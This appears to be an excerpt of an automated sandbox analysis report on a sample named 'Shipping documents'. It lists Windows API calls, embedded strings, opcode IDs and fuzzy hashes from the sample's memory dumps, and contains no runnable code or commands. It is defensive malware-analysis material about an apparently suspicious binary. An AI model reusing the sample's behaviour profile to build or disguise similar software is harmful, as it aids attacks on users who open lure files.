• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
• ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
• ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
• SendMessageW.USER32 ref: 0047184F
• SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
• SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                          • String ID:
                                                                                                          • API String ID: 4116747274-0
                                                                                                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                          • _wcslen.LIBCMT ref: 00461683
                                                                                                          • __swprintf.LIBCMT ref: 00461721
                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                          • GetParent.USER32(?), ref: 004618C3
                                                                                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                          Similarity
                                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                          • String ID: %s%u
                                                                                                          • API String ID: 1899580136-679674701
                                                                                                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                          Similarity
                                                                                                          • API ID: InfoItemMenu$Sleep
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1196289194-4108050209
                                                                                                          • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                          • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 0043143E
                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                          Similarity
                                                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                          • String ID: (
                                                                                                          • API String ID: 3300687185-3887548279
                                                                                                          • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                                                                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                          • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                                                                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                          APIs
                                                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                          • API String ID: 1976180769-4113822522
                                                                                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                          • String ID:
                                                                                                          • API String ID: 461458858-0
                                                                                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                          • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                          Similarity
                                                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3969911579-0
                                                                                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                          APIs
                                                                                                          Strings
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
• String ID: 0
• API String ID: 956284711-4108050209
• Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
• Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
• Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
• Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
APIs
Strings
Similarity
• API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 1965227024-3771769585
• Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
• Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
• Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
• Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
Strings
Similarity
• API ID: SendString$_memmove_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 369157077-1007645807
• Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
• Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
APIs
• GetParent.USER32 ref: 00445BF8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
• __wcsicoll.LIBCMT ref: 00445C33
• __wcsicoll.LIBCMT ref: 00445C4F
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
Strings
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
• Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
• Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
APIs
• SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
• CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
• SendMessageW.USER32(?,?,00000000,?), ref: 00449332
• SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
• SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
• SendMessageW.USER32(?,00000402,?), ref: 00449399
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
• Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
• Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
• Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32(?), ref: 004787B9
• _wcscpy.LIBCMT ref: 004787E5
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 3052893215-2127371420
• Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
• Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
• Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
• Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
• __swprintf.LIBCMT ref: 0045E7F7
• _wprintf.LIBCMT ref: 0045E8B3
• _wprintf.LIBCMT ref: 0045E8D7
Strings
                                                                                                          Similarity
                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 2295938435-2354261254
                                                                                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                          • API String ID: 3038501623-2263619337
                                                                                                          • Opcode ID: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                                                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                          • Opcode Fuzzy Hash: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                                                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                          • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                          • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                          • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 2295938435-8599901
                                                                                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 00443B67
                                                                                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                          • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                          • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                          • IsWindow.USER32(00000000), ref: 00443C3A
                                                                                                          • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                          • String ID: BUTTON
                                                                                                          • API String ID: 1834419854-3405671355
                                                                                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                          • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • _wprintf.LIBCMT ref: 00454074
                                                                                                          • __swprintf.LIBCMT ref: 004540A3
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                          • API String ID: 455036304-4153970271
                                                                                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                          APIs
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                          • _memmove.LIBCMT ref: 00467EB8
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                          • _memmove.LIBCMT ref: 00467F6C
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2170234536-0
                                                                                                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
• Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
• Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
• Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 004714DC
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
• DeleteObject.GDI32(?), ref: 0047151E
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
• DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
• DeleteObject.GDI32(?), ref: 004715EA
• DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
• String ID:
• API String ID: 3218148540-0
• Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
• Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
• Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
• Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
APIs
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
